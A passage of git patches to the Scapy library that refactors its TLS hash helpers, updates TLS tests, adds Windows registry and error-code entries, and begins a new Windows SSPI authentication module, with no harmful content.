hashes.Hash(self.hash_cls(), backend=default_backend()) + digest.update(tbd) + return digest.finalize() class Hash_NULL(_GenericHash): @@ -46,32 +54,76 @@ class Hash_MD4(_GenericHash): hash_cls = md4 hash_len = 16 + def digest(self, tbd): + return self.hash_cls(tbd).digest() + class Hash_MD5(_GenericHash): - hash_cls = md5 + hash_cls = hashes.MD5 hash_len = 16 class Hash_SHA(_GenericHash): - hash_cls = sha1 + hash_cls = hashes.SHA1 hash_len = 20 +_tls_hash_algs["sha1"] = Hash_SHA + + class Hash_SHA224(_GenericHash): - hash_cls = sha224 + hash_cls = hashes.SHA224 hash_len = 28 class Hash_SHA256(_GenericHash): - hash_cls = sha256 + hash_cls = hashes.SHA256 hash_len = 32 class Hash_SHA384(_GenericHash): - hash_cls = sha384 + hash_cls = hashes.SHA384 hash_len = 48 class Hash_SHA512(_GenericHash): - hash_cls = sha512 + hash_cls = hashes.SHA512 hash_len = 64 + + +# first, we add the "md5-sha1" hash from openssl to python-cryptography +class MD5_SHA1(HashAlgorithm): + name = "md5-sha1" + digest_size = 36 + block_size = 64 + + +class Hash_MD5SHA1(_GenericHash): + hash_cls = MD5_SHA1 + hash_len = 36 + + +_tls_hash_algs["md5-sha1"] = Hash_MD5SHA1 + + +class Hash_SHAKE256(_GenericHash): + hash_cls = hashes.SHAKE256 + + def __init__(self, digest_size: int): + self.hash_len = digest_size + + def digest(self, tbd): + digest = hashes.Hash(self.hash_cls(self.hash_len), backend=default_backend()) + digest.update(tbd) + return digest.finalize() + + +@crypto_validator +def _get_hash(hashStr): + """ + Return a cryptography-hash by its name + """ + try: + return _tls_hash_algs[hashStr].hash_cls() + except KeyError: + raise KeyError("Unknown hash function %s" % hashStr) diff --git a/scapy/layers/tls/crypto/hkdf.py b/scapy/layers/tls/crypto/hkdf.py index 649305666a5..2d2af9d272b 100644 --- a/scapy/layers/tls/crypto/hkdf.py +++ b/scapy/layers/tls/crypto/hkdf.py @@ -10,7 +10,7 @@ import struct from scapy.config import conf, crypto_validator -from scapy.layers.tls.crypto.pkcs1 import _get_hash +from scapy.layers.tls.crypto.hash import _get_hash if conf.crypto_valid: from cryptography.hazmat.backends import default_backend diff --git a/scapy/layers/tls/crypto/pkcs1.py b/scapy/layers/tls/crypto/pkcs1.py index 18008a5e7d8..82082edc3de 100644 --- a/scapy/layers/tls/crypto/pkcs1.py +++ b/scapy/layers/tls/crypto/pkcs1.py @@ -16,12 +16,12 @@ from scapy.config import conf, crypto_validator from scapy.error import warning +from scapy.layers.tls.crypto.hash import _get_hash if conf.crypto_valid: from cryptography.exceptions import InvalidSignature, UnsupportedAlgorithm from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import hashes from cryptography.hazmat.primitives.asymmetric import padding - from cryptography.hazmat.primitives.hashes import HashAlgorithm ##################################################################### @@ -89,31 +89,7 @@ def _legacy_pkcs1_v1_5_encode_md5_sha1(M, emLen): # Hash and padding helpers ##################################################################### -_get_hash = None if conf.crypto_valid: - - # first, we add the "md5-sha1" hash from openssl to python-cryptography - class MD5_SHA1(HashAlgorithm): - name = "md5-sha1" - digest_size = 36 - block_size = 64 - - _hashes = { - "md5": hashes.MD5, - "sha1": hashes.SHA1, - "sha224": hashes.SHA224, - "sha256": hashes.SHA256, - "sha384": hashes.SHA384, - "sha512": hashes.SHA512, - "md5-sha1": MD5_SHA1 - } - - def _get_hash(hashStr): - try: - return _hashes[hashStr]() - except KeyError: - raise KeyError("Unknown hash function %s" % hashStr) - def _get_padding(padStr, mgf=padding.MGF1, h=hashes.SHA256, label=None): if padStr == "pkcs": return padding.PKCS1v15() diff --git a/scapy/layers/tls/crypto/prf.py b/scapy/layers/tls/crypto/prf.py index 39f35509e54..d5e7e76f5b9 100644 --- a/scapy/layers/tls/crypto/prf.py +++ b/scapy/layers/tls/crypto/prf.py @@ -73,7 +73,7 @@ def _tls_P_SHA512(secret, seed, req_len): # PRF functions, according to the protocol version def _sslv2_PRF(secret, seed, req_len): - hash_md5 = _tls_hash_algs["MD5"]() + hash_md5 = _tls_hash_algs["md5"]() rounds = (req_len + hash_md5.hash_len - 1) // hash_md5.hash_len res = b"" @@ -108,8 +108,8 @@ def _ssl_PRF(secret, seed, req_len): b"M", b"N", b"O", b"P", b"Q", b"R", b"S", b"T", b"U", b"V", b"W", b"X", # noqa: E501 b"Y", b"Z"] res = b"" - hash_sha1 = _tls_hash_algs["SHA"]() - hash_md5 = _tls_hash_algs["MD5"]() + hash_sha1 = _tls_hash_algs["sha"]() + hash_md5 = _tls_hash_algs["md5"]() rounds = (req_len + hash_md5.hash_len - 1) // hash_md5.hash_len for i in range(rounds): @@ -185,7 +185,7 @@ class PRF(object): context of the connection state using the tls_version and the cipher suite. """ - def __init__(self, hash_name="SHA256", tls_version=0x0303): + def __init__(self, hash_name="sha256", tls_version=0x0303): self.tls_version = tls_version self.hash_name = hash_name @@ -197,13 +197,13 @@ def __init__(self, hash_name="SHA256", tls_version=0x0303): tls_version == 0x0302): # TLS 1.1 self.prf = _tls_PRF elif tls_version == 0x0303: # TLS 1.2 - if hash_name == "SHA384": + if hash_name == "sha384": self.prf = _tls12_SHA384PRF - elif hash_name == "SHA512": + elif hash_name == "sha512": self.prf = _tls12_SHA512PRF else: - if hash_name in ["MD5", "SHA"]: - self.hash_name = "SHA256" + if hash_name in ["md5", "sha"]: + self.hash_name = "sha256" self.prf = _tls12_SHA256PRF else: warning("Unknown TLS version") @@ -270,8 +270,8 @@ def compute_verify_data(self, con_end, read_or_write, sslv3_sha1_pad1 = b"\x36" * 40 sslv3_sha1_pad2 = b"\x5c" * 40 - md5 = _tls_hash_algs["MD5"]() - sha1 = _tls_hash_algs["SHA"]() + md5 = _tls_hash_algs["md5"]() + sha1 = _tls_hash_algs["sha"]() md5_hash = md5.digest(master_secret + sslv3_md5_pad2 + md5.digest(handshake_msg + label + @@ -290,8 +290,8 @@ def compute_verify_data(self, con_end, read_or_write, label = ("%s finished" % d[con_end]).encode() if self.tls_version <= 0x0302: - s1 = _tls_hash_algs["MD5"]().digest(handshake_msg) - s2 = _tls_hash_algs["SHA"]().digest(handshake_msg) + s1 = _tls_hash_algs["md5"]().digest(handshake_msg) + s2 = _tls_hash_algs["sha"]().digest(handshake_msg) verify_data = self.prf(master_secret, label, s1 + s2, 12) else: h = _tls_hash_algs[self.hash_name]() @@ -317,7 +317,7 @@ def postprocess_key_for_export(self, key, client_random, server_random, tbh = key + client_random + server_random else: tbh = key + server_random + client_random - export_key = _tls_hash_algs["MD5"]().digest(tbh)[:req_len] + export_key = _tls_hash_algs["md5"]().digest(tbh)[:req_len] else: if s: tag = b"client write key" @@ -346,7 +346,7 @@ def generate_iv_for_export(self, client_random, server_random, tbh = client_random + server_random else: tbh = server_random + client_random - iv = _tls_hash_algs["MD5"]().digest(tbh)[:req_len] + iv = _tls_hash_algs["md5"]().digest(tbh)[:req_len] else: iv_block = self.prf("", b"IV block", diff --git a/scapy/layers/tls/crypto/suites.py b/scapy/layers/tls/crypto/suites.py index f7079384d42..1626a442717 100644 --- a/scapy/layers/tls/crypto/suites.py +++ b/scapy/layers/tls/crypto/suites.py @@ -29,7 +29,7 @@ class and the HMAC class, through the parsing of the ciphersuite name. if s.endswith("CCM") or s.endswith("CCM_8"): kx_name, s = s.split("_WITH_") kx_alg = _tls_kx_algs.get(kx_name) - hash_alg = _tls_hash_algs.get("SHA256") + hash_alg = _tls_hash_algs.get("sha256") cipher_alg = _tls_cipher_algs.get(s) hmac_alg = None @@ -42,7 +42,7 @@ class and the HMAC class, through the parsing of the ciphersuite name. kx_alg = _tls_kx_algs.get("TLS13") hash_name = s.split('_')[-1] - hash_alg = _tls_hash_algs.get(hash_name) + hash_alg = _tls_hash_algs.get(hash_name.lower()) cipher_name = s[:-(len(hash_name) + 1)] if tls1_3: @@ -61,7 +61,7 @@ class and the HMAC class, through the parsing of the ciphersuite name. cipher_alg = _tls_cipher_algs.get(cipher_name.rstrip("_EXPORT40")) kx_alg.export = cipher_name.endswith("_EXPORT40") hmac_alg = _tls_hmac_algs.get("HMAC-NULL") - hash_alg = _tls_hash_algs.get(hash_name) + hash_alg = _tls_hash_algs.get(hash_name.lower()) return kx_alg, cipher_alg, hmac_alg, hash_alg, tls1_3 diff --git a/scapy/layers/windows/erref.py b/scapy/layers/windows/erref.py index b18cacf769e..5909b5d3727 100644 --- a/scapy/layers/windows/erref.py +++ b/scapy/layers/windows/erref.py @@ -17,7 +17,6 @@ 0x00000011: "ERROR_NOT_SAME_DEVICE", 0x00000013: "ERROR_WRITE_PROTECT", 0x00000057: "ERROR_INVALID_PARAMETER", - 0xC000006A: "STATUS_WRONG_PASSWORD", 0x0000007A: "ERROR_INSUFFICIENT_BUFFER", 0x0000007B: "ERROR_INVALID_NAME", 0x000000A1: "ERROR_BAD_PATHNAME", @@ -53,6 +52,7 @@ 0xC0000043: "STATUS_SHARING_VIOLATION", 0xC0000061: "STATUS_PRIVILEGE_NOT_HELD", 0xC0000064: "STATUS_NO_SUCH_USER", + 0xC000006A: "STATUS_WRONG_PASSWORD", 0xC000006D: "STATUS_LOGON_FAILURE", 0xC000006E: "STATUS_ACCOUNT_RESTRICTION", 0xC0000070: "STATUS_INVALID_WORKSTATION", @@ -73,5 +73,6 @@ 0xC000020C: "STATUS_CONNECTION_DISCONNECTED", 0xC0000225: "STATUS_NOT_FOUND", 0xC0000257: "STATUS_PATH_NOT_COVERED", + 0xC00002FB: "STATUS_KDC_INVALID_REQUEST", 0xC000035C: "STATUS_NETWORK_SESSION_EXPIRED", } diff --git a/scapy/layers/windows/registry.py b/scapy/layers/windows/registry.py index 198806b75c6..62c26216c0c 100644 --- a/scapy/layers/windows/registry.py +++ b/scapy/layers/windows/registry.py @@ -105,6 +105,7 @@ class RegType(IntEnum): # These constants are used to specify the type of a registry value. + REG_NONE = 0 # No defined value type REG_SZ = 1 # Unicode string REG_EXPAND_SZ = 2 # Unicode string with environment variable expansion REG_BINARY = 3 # Binary data @@ -194,7 +195,7 @@ def __init__( ]: if not isinstance(reg_data, str): raise ValueError("Data must be a 'str' for this type.") - elif reg_type == RegType.REG_BINARY: + elif reg_type in [RegType.REG_NONE, RegType.REG_BINARY]: if not isinstance(reg_data, bytes): raise ValueError("Data must be a 'bytes' for this type.") elif reg_type in [ @@ -227,7 +228,7 @@ def encode(self) -> bytes: RegType.REG_LINK, ]: return self.reg_data.encode("utf-16le") - elif self.reg_type == RegType.REG_BINARY: + elif self.reg_type in [RegType.REG_NONE, RegType.REG_BINARY]: return self.reg_data elif self.reg_type in [ RegType.REG_DWORD, @@ -257,7 +258,7 @@ def frombytes(reg_name: str, reg_type: RegType, data: bytes): RegType.REG_LINK, ]: reg_data = data.decode("utf-16le") - elif reg_type == RegType.REG_BINARY: + elif reg_type in [RegType.REG_NONE, RegType.REG_BINARY]: reg_data = data elif reg_type in [ RegType.REG_DWORD, @@ -292,7 +293,7 @@ def fromstr(reg_name: str, reg_type: RegType, data: str): RegType.REG_LINK, ]: reg_data = data - elif reg_type == RegType.REG_BINARY: + elif reg_type in [RegType.REG_NONE, RegType.REG_BINARY]: reg_data = bytes.fromhex(data) elif reg_type in [ RegType.REG_DWORD, diff --git a/scapy/modules/ticketer.py b/scapy/modules/ticketer.py index 16716ae0637..4bc469a78f9 100644 --- a/scapy/modules/ticketer.py +++ b/scapy/modules/ticketer.py @@ -2594,7 +2594,7 @@ def resign_ticket(self, i, hash=None, kdc_hash=None): def request_tgt( self, - upn, + upn=None, ip=None, key=None, password=None, diff --git a/test/scapy/layers/tls/tls.uts b/test/scapy/layers/tls/tls.uts index 0fff89f2f37..3c3d47b834d 100644 --- a/test/scapy/layers/tls/tls.uts +++ b/test/scapy/layers/tls/tls.uts @@ -17,35 +17,35 @@ = Crypto - Hmac_MD5 instantiation, parameter check from scapy.layers.tls.crypto.h_mac import Hmac_MD5 -a = Hmac_MD5("somekey") +a = Hmac_MD5(b"somekey") a.key_len == 16 and a.hmac_len == 16 = Crypto - Hmac_MD5 behavior on test vectors from RFC 2202 (+ errata) a = Hmac_MD5 -t1 = a(b'\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b').digest("Hi There") == b'\x92\x94\x72\x7a\x36\x38\xbb\x1c\x13\xf4\x8e\xf8\x15\x8b\xfc\x9d' -t2 = a('Jefe').digest('what do ya want for nothing?') == b'\x75\x0c\x78\x3e\x6a\xb0\xb5\x03\xea\xa8\x6e\x31\x0a\x5d\xb7\x38' +t1 = a(b'\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b').digest(b"Hi There") == b'\x92\x94\x72\x7a\x36\x38\xbb\x1c\x13\xf4\x8e\xf8\x15\x8b\xfc\x9d' +t2 = a(b'Jefe').digest(b'what do ya want for nothing?') == b'\x75\x0c\x78\x3e\x6a\xb0\xb5\x03\xea\xa8\x6e\x31\x0a\x5d\xb7\x38' t3 = a(b'\xaa'*16).digest(b'\xdd'*50) == b'\x56\xbe\x34\x52\x1d\x14\x4c\x88\xdb\xb8\xc7\x33\xf0\xe8\xb3\xf6' t4 = a(b'\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19').digest(b'\xcd'*50) == b'\x69\x7e\xaf\x0a\xca\x3a\x3a\xea\x3a\x75\x16\x47\x46\xff\xaa\x79' -t5 = a(b'\x0c'*16).digest("Test With Truncation") == b'\x56\x46\x1e\xf2\x34\x2e\xdc\x00\xf9\xba\xb9\x95\x69\x0e\xfd\x4c' -t6 = a(b'\xaa'*80).digest("Test Using Larger Than Block-Size Key - Hash Key First") == b'\x6b\x1a\xb7\xfe\x4b\xd7\xbf\x8f\x0b\x62\xe6\xce\x61\xb9\xd0\xcd' -t7 = a(b'\xaa'*80).digest("Test Using Larger Than Block-Size Key and Larger Than One Block-Size Data") == b'\x6f\x63\x0f\xad\x67\xcd\xa0\xee\x1f\xb1\xf5\x62\xdb\x3a\xa5\x3e' +t5 = a(b'\x0c'*16).digest(b"Test With Truncation") == b'\x56\x46\x1e\xf2\x34\x2e\xdc\x00\xf9\xba\xb9\x95\x69\x0e\xfd\x4c' +t6 = a(b'\xaa'*80).digest(b"Test Using Larger Than Block-Size Key - Hash Key First") == b'\x6b\x1a\xb7\xfe\x4b\xd7\xbf\x8f\x0b\x62\xe6\xce\x61\xb9\xd0\xcd' +t7 = a(b'\xaa'*80).digest(b"Test Using Larger Than Block-Size Key and Larger Than One Block-Size Data") == b'\x6f\x63\x0f\xad\x67\xcd\xa0\xee\x1f\xb1\xf5\x62\xdb\x3a\xa5\x3e' t1 and t2 and t3 and t4 and t5 and t6 and t7 = Crypto - Hmac_SHA instantiation, parameter check from scapy.layers.tls.crypto.h_mac import Hmac_SHA -a = Hmac_SHA("somekey") +a = Hmac_SHA(b"somekey") a.key_len == 20 and a.hmac_len == 20 = Crypto - Hmac_SHA behavior on test vectors from RFC 2202 (+ errata) a = Hmac_SHA -t1 = a(b'\x0b'*20).digest("Hi There") == b'\xb6\x17\x31\x86\x55\x05\x72\x64\xe2\x8b\xc0\xb6\xfb\x37\x8c\x8e\xf1\x46\xbe\x00' -t2 = a('Jefe').digest("what do ya want for nothing?") == b'\xef\xfc\xdf\x6a\xe5\xeb\x2f\xa2\xd2\x74\x16\xd5\xf1\x84\xdf\x9c\x25\x9a\x7c\x79' +t1 = a(b'\x0b'*20).digest(b"Hi There") == b'\xb6\x17\x31\x86\x55\x05\x72\x64\xe2\x8b\xc0\xb6\xfb\x37\x8c\x8e\xf1\x46\xbe\x00' +t2 = a(b'Jefe').digest(b"what do ya want for nothing?") == b'\xef\xfc\xdf\x6a\xe5\xeb\x2f\xa2\xd2\x74\x16\xd5\xf1\x84\xdf\x9c\x25\x9a\x7c\x79' t3 = a(b'\xaa'*20).digest(b'\xdd'*50) == b'\x12\x5d\x73\x42\xb9\xac\x11\xcd\x91\xa3\x9a\xf4\x8a\xa1\x7b\x4f\x63\xf1\x75\xd3' t4 = a(b'\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19').digest(b'\xcd'*50) == b'\x4c\x90\x07\xf4\x02\x62\x50\xc6\xbc\x84\x14\xf9\xbf\x50\xc8\x6c\x2d\x72\x35\xda' -t5 = a(b'\x0c'*20).digest("Test With Truncation") == b'\x4c\x1a\x03\x42\x4b\x55\xe0\x7f\xe7\xf2\x7b\xe1\xd5\x8b\xb9\x32\x4a\x9a\x5a\x04' -t6 = a(b'\xaa'*80).digest("Test Using Larger Than Block-Size Key - Hash Key First") == b'\xaa\x4a\xe5\xe1\x52\x72\xd0\x0e\x95\x70\x56\x37\xce\x8a\x3b\x55\xed\x40\x21\x12' -t7 = a(b'\xaa'*80).digest("Test Using Larger Than Block-Size Key and Larger Than One Block-Size Data") == b'\xe8\xe9\x9d\x0f\x45\x23\x7d\x78\x6d\x6b\xba\xa7\x96\x5c\x78\x08\xbb\xff\x1a\x91' +t5 = a(b'\x0c'*20).digest(b"Test With Truncation") == b'\x4c\x1a\x03\x42\x4b\x55\xe0\x7f\xe7\xf2\x7b\xe1\xd5\x8b\xb9\x32\x4a\x9a\x5a\x04' +t6 = a(b'\xaa'*80).digest(b"Test Using Larger Than Block-Size Key - Hash Key First") == b'\xaa\x4a\xe5\xe1\x52\x72\xd0\x0e\x95\x70\x56\x37\xce\x8a\x3b\x55\xed\x40\x21\x12' +t7 = a(b'\xaa'*80).digest(b"Test Using Larger Than Block-Size Key and Larger Than One Block-Size Data") == b'\xe8\xe9\x9d\x0f\x45\x23\x7d\x78\x6d\x6b\xba\xa7\x96\x5c\x78\x08\xbb\xff\x1a\x91' t1 and t2 and t3 and t4 and t5 and t6 and t7 @@ -304,21 +304,21 @@ t1 and t2 and t3 and t4 and t5 and t6 and t7 from scapy.layers.tls.crypto.prf import PRF class _prf_tls12_sha256_test: - h= "SHA256" + h= "sha256" k= b"\x9b\xbe\x43\x6b\xa9\x40\xf0\x17\xb1\x76\x52\x84\x9a\x71\xdb\x35" s= b"\xa0\xba\x9f\x93\x6c\xda\x31\x18\x27\xa6\xf7\x96\xff\xd5\x19\x8c" o=(b"\xe3\xf2\x29\xba\x72\x7b\xe1\x7b\x8d\x12\x26\x20\x55\x7c\xd4\x53" + b"\xc2\xaa\xb2\x1d\x07\xc3\xd4\x95\x32\x9b\x52\xd4\xe6\x1e\xdb\x5a") class _prf_tls12_sha384_test: - h= "SHA384" + h= "sha384" k= b"\xb8\x0b\x73\x3d\x6c\xee\xfc\xdc\x71\x56\x6e\xa4\x8e\x55\x67\xdf" s= b"\xcd\x66\x5c\xf6\xa8\x44\x7d\xd6\xff\x8b\x27\x55\x5e\xdb\x74\x65" o=(b"\x7b\x0c\x18\xe9\xce\xd4\x10\xed\x18\x04\xf2\xcf\xa3\x4a\x33\x6a" + b"\x1c\x14\xdf\xfb\x49\x00\xbb\x5f\xd7\x94\x21\x07\xe8\x1c\x83\xcd") class _prf_tls12_sha512_test: - h= "SHA512" + h= "sha512" k= b"\xb0\x32\x35\x23\xc1\x85\x35\x99\x58\x4d\x88\x56\x8b\xbb\x05\xeb" s= b"\xd4\x64\x0e\x12\xe4\xbc\xdb\xfb\x43\x7f\x03\xe6\xae\x41\x8e\xe5" o=(b"\x12\x61\xf5\x88\xc7\x98\xc5\xc2\x01\xff\x03\x6e\x7a\x9c\xb5\xed" + @@ -1028,6 +1028,7 @@ assert len(pkt.exchkeys.ecdh_Yc) == 133 # len(b'\x04') + ceil(521/8) * 2 # See https://github.com/secdev/scapy/issues/2784 +import base64 from scapy.layers.tls.cert import PrivKey from scapy.layers.tls.handshake import TLSFinished from scapy.layers.tls.record import TLS @@ -1067,7 +1068,7 @@ r2 = TLS(shello_extms, tls_session=r1.tls_session.mirror()) r3 = TLS(finished_extms, tls_session=r2.tls_session.mirror()) assert r3.tls_session.extms -assert r3.tls_session.pwcs.prf.hash_name == "SHA256" +assert r3.tls_session.pwcs.prf.hash_name == "sha256" assert r3.tls_session.session_hash == b'2\xdc\xf5\xcb\xbc\x99\xc6IV\xba\x0f.\x0bdq\x1f=\xef\xdaW\xfc*A\x9b\xe2?b\xccKW\xe9\xb7' l3 = r3.getlayer(TLS, 3) From 667dd9439411210fa6ce17aa0930cefc384ef977 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Wed, 22 Apr 2026 02:20:05 +0200 Subject: [PATCH 1626/1632] Add WinSSP SSP for implicit authentication (#4975) * Add WinSSPI SSP for Windows * Add WinSSP test --- doc/scapy/layers/gssapi.rst | 23 +- scapy/arch/__init__.py | 1 + scapy/arch/windows/sspi.py | 696 ++++++++++++++++++++++++++ scapy/layers/ntlm.py | 30 +- scapy/layers/smbclient.py | 19 +- scapy/layers/tls/crypto/hash.py | 26 +- test/scapy/layers/ntlm.uts | 4 +- test/scapy/layers/smbclientserver.uts | 16 + 8 files changed, 792 insertions(+), 23 deletions(-) create mode 100644 scapy/arch/windows/sspi.py diff --git a/doc/scapy/layers/gssapi.rst b/doc/scapy/layers/gssapi.rst index d4b3d6571bd..d405d6f8ff6 100644 --- a/doc/scapy/layers/gssapi.rst +++ b/doc/scapy/layers/gssapi.rst @@ -21,6 +21,7 @@ The following SSPs are currently provided: - :class:`~scapy.layers.kerberos.KerberosSSP` - :class:`~scapy.layers.spnego.SPNEGOSSP` - :class:`~scapy.layers.msrpce.msnrpc.NetlogonSSP` + - :class:`~scapy.arch.windows.sspi.WinSSP` (Windows only) Basically those are classes that implement two functions, trying to micmic the RFCs: @@ -134,4 +135,24 @@ Let's use :class:`~scapy.layers.ntlm.NTLMSSP` as an example of server-side SSP. } ) -You'll find other examples of how to instantiate a SSP in the docstrings of each SSP. See `the list <#ssplist>`_ \ No newline at end of file +You'll find other examples of how to instantiate a SSP in the docstrings of each SSP. See `the list <#ssplist>`_ + +WinSSP +~~~~~~ + +WinSSP is a special SSP that is only available on Windows, which calls the actual Windows SSPs local to the machine it's running on. +It allows to use the implicit authentication of the logged-in user with Scapy and its various clients, and is also improves support of loopback connections. + +For instance using SPNEGO: + +.. code:: python + + from scapy.arch.windows.sspi import * + clissp = WinSSP(Package="Negotiate") + +For instance using NTLM: + +.. code:: python + + from scapy.arch.windows.sspi import * + clissp = WinSSP(Package="NTLM") diff --git a/scapy/arch/__init__.py b/scapy/arch/__init__.py index 316d398f570..bea0a570e02 100644 --- a/scapy/arch/__init__.py +++ b/scapy/arch/__init__.py @@ -143,6 +143,7 @@ def get_if_raw_addr6(iff): elif WINDOWS: from scapy.arch.windows import * # noqa F403 from scapy.arch.windows.native import * # noqa F403 + from scapy.arch.windows.sspi import * # noqa F403 SIOCGIFHWADDR = 0 # mypy compat else: log_loading.critical( diff --git a/scapy/arch/windows/sspi.py b/scapy/arch/windows/sspi.py new file mode 100644 index 00000000000..8d50a0532f9 --- /dev/null +++ b/scapy/arch/windows/sspi.py @@ -0,0 +1,696 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +SSP for implicit authentication on Windows +""" + +import ctypes +import ctypes.wintypes +import enum + +from scapy.layers.gssapi import ( + GSS_C_FLAGS, + GSS_S_FLAGS, + GSS_C_NO_CHANNEL_BINDINGS, + GssChannelBindings, + GSSAPI_BLOB, + SSP, + GSS_S_BAD_NAME, + GSS_S_COMPLETE, + GSS_S_CONTINUE_NEEDED, + GSS_S_DEFECTIVE_CREDENTIAL, + GSS_S_DEFECTIVE_TOKEN, + GSS_S_FAILURE, + GSS_S_UNAUTHORIZED, + GSS_S_UNAVAILABLE, +) + +# Typing imports +from typing import ( + Optional, +) + +# Windows bindings + +SECPKG_CRED_INBOUND = 0x00000001 +SECPKG_CRED_OUTBOUND = 0x00000002 +SECPKG_CRED_BOTH = 0x00000003 + +SECPKG_ATTR_SESSION_KEY = 9 +SECPKG_ATTR_SERVER_FLAGS = 14 + + +class SecPkgContext_SessionKey(ctypes.Structure): + _fields_ = [ + ("SessionKeyLength", ctypes.wintypes.ULONG), + ("SessionKey", ctypes.wintypes.LPBYTE), + ] + + +class SecPkgContext_Flags(ctypes.Structure): + _fields_ = [ + ("Flags", ctypes.wintypes.ULONG), + ] + + +SECURITY_NETWORK_DREP = 0 + + +class SEC_CODES(enum.IntEnum): + """ + Windows sspi.h return codes + """ + + SEC_E_OK = 0x00000000 + SEC_I_CONTINUE_NEEDED = 0x00090312 + SEC_I_COMPLETE_AND_CONTINUE = 0x00090314 + SEC_E_INSUFFICIENT_MEMORY = 0x80090300 + SEC_E_INTERNAL_ERROR = 0x80090304 + SEC_E_INVALID_HANDLE = 0x80090301 + SEC_E_INVALID_TOKEN = 0x80090308 + SEC_E_LOGON_DENIED = 0x8009030C + SEC_E_NO_AUTHENTICATING_AUTHORITY = 0x80090311 + SEC_E_NO_CREDENTIALS = 0x8009030E + SEC_E_TARGET_UNKNOWN = 0x80090303 + SEC_E_UNSUPPORTED_FUNCTION = 0x80090302 + SEC_E_WRONG_PRINCIPAL = 0x80090322 + + @staticmethod + def to_GSS(code: int): + if code in _GSS_REG_TRANSLATION: + return _GSS_REG_TRANSLATION[code] + else: + return code + + +_GSS_REG_TRANSLATION = { + SEC_CODES.SEC_E_OK: GSS_S_COMPLETE, + SEC_CODES.SEC_I_CONTINUE_NEEDED: GSS_S_CONTINUE_NEEDED, + SEC_CODES.SEC_I_COMPLETE_AND_CONTINUE: GSS_S_CONTINUE_NEEDED, + SEC_CODES.SEC_E_INSUFFICIENT_MEMORY: GSS_S_FAILURE, + SEC_CODES.SEC_E_INTERNAL_ERROR: GSS_S_FAILURE, + SEC_CODES.SEC_E_INVALID_HANDLE: GSS_S_DEFECTIVE_CREDENTIAL, + SEC_CODES.SEC_E_INVALID_TOKEN: GSS_S_DEFECTIVE_TOKEN, + SEC_CODES.SEC_E_LOGON_DENIED: GSS_S_UNAUTHORIZED, + SEC_CODES.SEC_E_NO_AUTHENTICATING_AUTHORITY: GSS_S_UNAVAILABLE, + SEC_CODES.SEC_E_NO_CREDENTIALS: GSS_S_DEFECTIVE_CREDENTIAL, + SEC_CODES.SEC_E_TARGET_UNKNOWN: GSS_S_BAD_NAME, + SEC_CODES.SEC_E_UNSUPPORTED_FUNCTION: GSS_S_UNAVAILABLE, + SEC_CODES.SEC_E_WRONG_PRINCIPAL: GSS_S_BAD_NAME, +} + + +class SECURITY_INTEGER(ctypes.Structure): + _fields_ = [ + ("LowPart", ctypes.wintypes.ULONG), + ("HighPart", ctypes.wintypes.LONG), + ] + + +class SecHandle(ctypes.Structure): + _fields_ = [ + ("dwLower", ctypes.POINTER(ctypes.wintypes.ULONG)), + ("dwUpper", ctypes.POINTER(ctypes.wintypes.ULONG)), + ] + + +_winapi_AcquireCredentialsHandle = ctypes.windll.secur32.AcquireCredentialsHandleW +_winapi_AcquireCredentialsHandle.restype = ctypes.wintypes.DWORD +_winapi_AcquireCredentialsHandle.argtypes = [ + ctypes.wintypes.LPWSTR, # pszPrincipal + ctypes.wintypes.LPWSTR, # pszPackage + ctypes.wintypes.ULONG, # fCredentialUse + ctypes.c_void_p, # pvLogonID + ctypes.c_void_p, # pAuthData + ctypes.c_void_p, # pGetKeyFn + ctypes.c_void_p, # pvGetKeyArgument + ctypes.POINTER(SecHandle), # phCredential, + ctypes.POINTER(SECURITY_INTEGER), # ptsExpiry +] + + +class SecBuffer(ctypes.Structure): + _fields_ = [ + ("cbBuffer", ctypes.wintypes.ULONG), + ("BufferType", ctypes.wintypes.ULONG), + ("pvBuffer", ctypes.c_void_p), + ] + + +SECBUFFER_VERSION = 0 +SECBUFFER_TOKEN = 2 +SECBUFFER_CHANNEL_BINDINGS = 14 + + +class SecBufferDesc(ctypes.Structure): + _fields_ = [ + ("ulVersion", ctypes.wintypes.ULONG), + ("cBuffers", ctypes.wintypes.ULONG), + ("pBuffers", ctypes.POINTER(ctypes.POINTER(SecBuffer))), + ] + + +_winapi_InitializeSecurityContext = ctypes.windll.secur32.InitializeSecurityContextW +_winapi_InitializeSecurityContext.restype = ctypes.wintypes.DWORD +_winapi_InitializeSecurityContext.argtypes = [ + ctypes.POINTER(SecHandle), # phCredential + ctypes.POINTER(SecHandle), # phContext (NULL on first call) + ctypes.wintypes.LPCWSTR, # pszTargetName + ctypes.wintypes.ULONG, # fContextReq + ctypes.wintypes.ULONG, # Reserved1 (must be 0) + ctypes.wintypes.ULONG, # TargetDataRep (e.g. SECURITY_NATIVE_DREP) + ctypes.POINTER(SecBufferDesc), # pInput (can be NULL) + ctypes.wintypes.ULONG, # Reserved2 (must be 0) + ctypes.POINTER(SecHandle), # phNewContext + ctypes.POINTER(SecBufferDesc), # pOutput + ctypes.POINTER(ctypes.wintypes.ULONG), # pfContextAttr + ctypes.POINTER(SECURITY_INTEGER), # ptsExpiry +] + +_winapi_AcceptSecurityContext = ctypes.windll.secur32.AcceptSecurityContext +_winapi_AcceptSecurityContext.restype = ctypes.wintypes.DWORD +_winapi_AcceptSecurityContext.argtypes = [ + ctypes.POINTER(SecHandle), # phCredential + ctypes.POINTER(SecHandle), # phContext (NULL on first call) + ctypes.POINTER(SecBufferDesc), # pInput + ctypes.wintypes.ULONG, # fContextReq + ctypes.wintypes.ULONG, # TargetDataRep (e.g. SECURITY_NATIVE_DREP) + ctypes.POINTER(SecHandle), # phNewContext + ctypes.POINTER(SecBufferDesc), # pOutput + ctypes.POINTER(ctypes.wintypes.ULONG), # pfContextAttr + 